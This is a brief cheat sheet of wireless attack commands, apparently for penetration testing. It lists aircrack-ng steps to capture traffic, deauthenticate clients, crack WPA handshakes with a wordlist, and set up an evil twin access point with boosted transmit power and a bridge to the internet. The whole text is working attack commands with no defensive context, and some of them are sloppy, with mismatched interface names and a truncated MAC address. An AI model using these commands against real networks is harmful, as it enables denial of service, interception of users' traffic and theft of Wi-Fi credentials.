Wireless Penetration Testing
Check for conflicting processes
airmon-ng check kill
Place card into monitor mode
airmon-ng start wlan1
Find available devices
airodump-ng wlan1mon
Start capturing information (channel 6)
airmon-ng -c 6 --bssid MAC -w capture wlan0mon
airodump-ng wlan1mon -w CAPTUREFILENAME -c 1
airodump-ng wlan1mon --bssid MAC --channel 1
Deauth attack
aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENT
aireplay-ng --deauth 0 -c CLIENT -a MAC_AP wlan1mon
Crack password
aircrack-ng anynamehere-01.cap
aircrack-ng capture--1.cap -w rockyou.txt
Or just use wifite
Evil Twin Attack
airmon-ng start wlan1
airodump-ng wlan1mon
Create a New AP with Same SSID & MAC Address
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 11 wlan0
Deauthentication
aireplay-ng --deauth 0 -a 00:09:5B:6F:1E
Turn up the power
iwconfig wlan1 txpower 27
Give the fake AP internet access
brctl addbr evil
brctl addif evil x0
This has internet access
brctl addif evil at0
This is create by airbase-ng (wired face of the wireless access point)
ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig evil up
dhclient3 evil &